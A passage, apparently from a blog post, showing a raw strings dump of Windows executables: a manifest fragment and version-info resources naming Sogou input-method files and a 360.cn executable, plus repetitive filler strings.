  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>

Unicode Strings:
---------------------------------------------------------------------------
jjjj
jjjjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjjh
jjjj
jjjjj
VS_VERSION_INFO
StringFileInfo
080404b0
Comments
CompanyName
Sogou.com Inc.
FileDescription
FileVersion
5.0.0.3787
InternalName
SogouPY SogouTSF
LegalCopyright
? 2010 Sogou.com Inc. All rights reserved.
LegalTrademarks
OriginalFilename
SogouTSF.dll
PrivateBuild
ProductName
ProductVersion
5.0.0.3787
SpecialBuild
VarFileInfo
Translation
Menu
Menu
Dialog
System
Cancel
Sting
VS_VERSION_INFO
StringFileInfo
080404b0
Comments
CompanyName
Sogou.com Inc.
FileDescription
FileVersion
5.0.0.3787
InternalName
SogouPY Config
LegalCopyright
? 2010 Sogou.com Inc. All rights reserved.
LegalTrademarks
OriginalFilename
Config.exe
PrivateBuild
ProductName
ProductVersion
5.0.0.3787
SpecialBuild
VarFileInfo
Translation
jjjj
@jjj
@jjj
@jjj
         (((((                  H
VS_VERSION_INFO
StringFileInfo
080404b0
CompanyName
360.cn
FileDescription
FileVersion
1, 0, 0, 1007
InternalName
360DeskAna.exe
LegalCopyright
(C) 360.cn Inc. All Rights Reserved.
OriginalFilename
360DeskAna.exe
ProductName
ProductVersion
1, 0, 0, 1007
VarFileInfo
Translation
Labels: ,